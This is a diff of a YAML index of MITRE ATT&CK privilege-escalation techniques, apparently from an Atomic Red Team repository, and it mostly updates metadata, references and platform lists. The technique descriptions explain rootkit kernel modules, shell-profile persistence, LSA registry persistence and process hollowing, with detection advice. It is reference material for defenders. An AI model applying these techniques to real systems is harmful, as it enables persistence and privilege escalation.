+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests:
     - name: Linux - Load Kernel Module via insmod
@@ -25138,7 +25452,7 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -25164,12 +25478,10 @@ privilege-escalation:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -25247,9 +25559,8 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests:
     - name: Create Systemd Service and Timer
@@ -25427,7 +25738,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -25501,11 +25811,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -25522,7 +25831,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -25532,7 +25840,7 @@ privilege-escalation:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -25541,19 +25849,17 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -25601,11 +25907,12 @@ privilege-escalation:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -25673,23 +25980,22 @@ privilege-escalation:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1068:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-04-07T17:13:54.168Z'
       name: Exploitation for Privilege Escalation
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -25752,11 +26058,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -25809,8 +26114,8 @@ privilege-escalation:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -25858,78 +26163,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -25977,6 +26215,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -25987,9 +26229,13 @@ privilege-escalation:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -25998,8 +26244,67 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests:
     - name: Add command to .bash_profile
@@ -26194,7 +26499,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -26219,13 +26524,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -26305,7 +26608,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.002:
     technique:
@@ -26341,7 +26643,7 @@ privilege-escalation:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -26364,12 +26666,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -26447,12 +26748,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1574.009:
     technique:
